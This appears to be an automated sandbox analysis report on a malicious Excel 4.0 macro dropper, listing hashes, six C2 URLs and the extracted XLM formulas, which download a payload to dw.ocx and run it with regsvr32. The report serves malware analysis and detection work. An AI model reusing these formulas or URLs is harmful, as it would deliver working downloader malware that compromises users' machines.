General

  • Target

    4dabc91bdf6e69e97c9595395d283906bafc945af546a4116513a1f344f18ab6

  • Size

    29KB

  • Sample

    241120-jthkfayleq

  • MD5

    7ae1c887379eda9abf51d00e6c37d5ae

  • SHA1

    f66dcf5bb37d15c23dd4a787bc17e442764116ab

  • SHA256

    4dabc91bdf6e69e97c9595395d283906bafc945af546a4116513a1f344f18ab6

  • SHA512

    d4c8078282222dfc53fcab90a24a86811ed74ff77ead5f3b350fbfb50b61f0f07b1c7949b0d76bfb40805a4975818e67196dd9ae56329c137165d7be9ca85e05

  • SSDEEP

    384:lDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:ZPELA2s61VECvgOZS4+NcDVOXD9F4IG

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://janshabd.com/E33ZFv/
    http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/
    http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/
    http://www.aacitygroup.com/mordacity/g29PQhuYA5x/
    http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/
    https://sse-studio.com/cq0xhpj/wdktmllfAYV/

  • Attributes

    formulas (one extracted XLM formula per line):

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/E33ZFv/","..\dw.ocx",0,0)
    =IF('OFJOV'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/","..\dw.ocx",0,0))
    =IF('OFJOV'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/","..\dw.ocx",0,0))
    =IF('OFJOV'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.aacitygroup.com/mordacity/g29PQhuYA5x/","..\dw.ocx",0,0))
    =IF('OFJOV'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/","..\dw.ocx",0,0))
    =IF('OFJOV'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sse-studio.com/cq0xhpj/wdktmllfAYV/","..\dw.ocx",0,0))
    =IF('OFJOV'!D21<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dw.ocx")
    =RETURN()

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    http://janshabd.com/E33ZFv/
    http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/

Targets

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
